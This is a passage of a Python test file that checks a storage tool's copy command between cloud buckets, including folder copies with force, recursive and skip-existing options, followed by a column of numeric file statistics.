os.path.abspath(self.test_file_2)) pipe_storage_cp(os.path.abspath(self.test_file_1), "cp://%s/%s" % (self.bucket_name, key1)) pipe_storage_cp(os.path.abspath(self.test_file_2), "cp://%s/%s" % (self.bucket_name, key2)) assert object_exists(self.bucket_name, key1) assert object_exists(self.bucket_name, key2) pipe_storage_cp(source_folder, destination_folder, force=True, recursive=True, skip_existing=True) assert object_exists(self.other_bucket_name, key1) assert object_exists(self.other_bucket_name, key2) actual = ObjectInfo(False).build(self.other_bucket_name, key1) assert not expected.size == actual.size, "Sizes must be the different." assert not expected.last_modified == actual.last_modified, \ "Last modified time of destination and source file must be different." except BaseException as e: pytest.fail("Test case {} failed. {}".format(case, e.message)) def _create_folder_on_bucket(self, case): source_files = os.path.abspath(self.test_folder) source1 = os.path.join(source_files, self.test_file_1) source2 = os.path.join(source_files, self.test_file_with_other_extension) source3 = os.path.join(source_files, self.test_folder, self.test_file_1) pipe_storage_cp(source1, "cp://%s/%s/%s" % (self.bucket_name, case, self.test_file_1)) pipe_storage_cp(source2, "cp://%s/%s/%s" % (self.bucket_name, case, self.test_file_with_other_extension)) pipe_storage_cp(source3, "cp://%s/%s/%s/%s" % (self.bucket_name, case, self.test_folder, self.test_file_1))
63.027548
120
0.648062
5,944
45,758
4.697005
0.042732
0.047065
0.067051
0.053082
0.908378
0.884702
0.855475
0.826892
0.797808
0.775852
0
0.015309
0.234866
45,758
725
121
63.114483
0.782126
0.022663
0
0.571659
0
0
0.086513
0.006502
0
0
0
0
0.167472
1
0.05314
false
0
0.004831
0
0.090177
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6